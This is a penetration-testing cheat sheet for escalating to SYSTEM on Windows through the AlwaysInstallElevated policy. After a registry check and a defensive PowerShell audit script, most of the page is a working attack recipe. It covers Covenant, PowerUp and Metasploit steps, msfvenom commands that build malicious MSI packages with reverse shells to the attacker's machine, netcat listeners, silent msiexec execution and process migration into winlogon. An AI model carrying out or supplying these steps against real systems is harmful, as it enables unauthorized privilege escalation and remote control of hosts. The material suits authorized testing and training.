AlwaysInstallElevated exploitation
Target requirements
The target needs to have these values in the registry:
In Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer with AlwaysInstallElevated set to 1
In Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer with AlwaysInstallElevated set to 1
This means that Windows Installer (.msi) packages are installed with elevated privileges, whichever user launches them.
Enumerate with cmd
Type
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
in a cmd prompt; AlwaysInstallElevated should be set to 1 (the HKCU key from the requirements above must also be 1).
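As an added example (not part of the original page), a PowerShell check that reads both policy keys described above, reports whether the condition is effective, and with -Remediate sets both values to 0. It assumes administrator rights for the HKLM change.

```powershell
# Added example: audit (and optionally remediate) the AlwaysInstallElevated policy.
# The condition is only effective when BOTH the HKLM and HKCU values are 1.
param(
    [switch]$Remediate   # when set, force both values to 0 (HKLM needs admin rights)
)

$paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

$results = foreach ($path in $paths) {
    $value = $null
    if (Test-Path $path) {
        # The key may exist without the value, so do not treat a missing value as an error
        $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated `
                  -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    [pscustomobject]@{
        Path    = $path
        Value   = $value          # $null means "not set", which is the safe default
        Enabled = ($value -eq 1)
    }
}

$results | Format-Table -AutoSize

# Effective only if no hive is missing/0
if (@($results | Where-Object { -not $_.Enabled }).Count -eq 0) {
    Write-Warning 'AlwaysInstallElevated is enabled in BOTH hives: any user can install MSI packages with elevated privileges.'
} else {
    Write-Host 'AlwaysInstallElevated is not effective (at least one hive is not set to 1).'
}

if ($Remediate) {
    foreach ($path in $paths) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        # Set an explicit 0 rather than deleting, so later audits see a defined value
        Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        Write-Host "Set AlwaysInstallElevated=0 in $path"
    }
}
```

If the value is delivered by Group Policy, correct it in the GPO as well, otherwise the next policy refresh will set it back to 1.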
Exploitation
You should already have a shell on the target (Covenant, Metasploit or netcat) or other access to it. We will use Covenant and Metasploit here.
Covenant
Enumerate with SharpUp audit
In your shell type
SharpUp audit
In the results you should see the AlwaysInstallElevated check flagged.
Enumerate with PowerUp
In the shell, type PowerShellImport, press Enter and fetch PowerUp.ps1 (if you do not have it you can get it here).
Click on Execute.
Type
powershell invoke-allchecks
in your shell. The output should list the AlwaysInstallElevated check.
Exploitation
Generate a payload with msfvenom:
msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi
Between the quotes, paste an encoded Covenant launcher.
Upload the file to the target using the Upload command from Covenant (type
Upload
and press Enter, fill in the file path on the target and browse to the file on your attack machine). Run it using
shell msiexec /quiet /qn /i exploitalwaysinstalled.msi
We should get a new reverse shell (grunt) running as an elevated user.
Exploitation with PowerUp
powershell -ep bypass
. .\PowerUp.ps1
Write-UserAddMSI
It will set up a malicious MSI called
UserAdd
Metasploit
Interact with a session you should already have from the initial foothold:
sessions -i num-of-session
Enumerate
Launch
run post/multi/recon/local_exploit_suggester
You should see:
- exploit/windows/local/always_install_elevated: The target is vulnerable.
Exploitation
Background your session with Ctrl+Z.
Type
use exploit/windows/local/always_install_elevated
Set SESSION to the number of the session you have on your target, then type
exploit -j
List the sessions; you should have another one running as NT AUTHORITY\SYSTEM.
Type ps and look for a process in session 1 that we can migrate to.
We can use winlogon.exe:
620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
Migrate to it using
migrate PID-number
In our example (the first column of the ps output is the PID) it is going to be
migrate 620
OR
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost your-Kali-IP
run
In another console tab:
msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi
Get the generated MSI onto your target (e.g. a Python HTTP server on the attack machine, then download it from a browser on the target).
On your target, place
setup.msi
in a folder where you have write access, open a command prompt and type:
msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi
Other way
Generate a malicious MSI package:
msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi
Set up a listener:
rlwrap nc -lnvp CHOSEN-PORT
Upload it to the target and execute it from cmd:
msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart
You should get an elevated shell.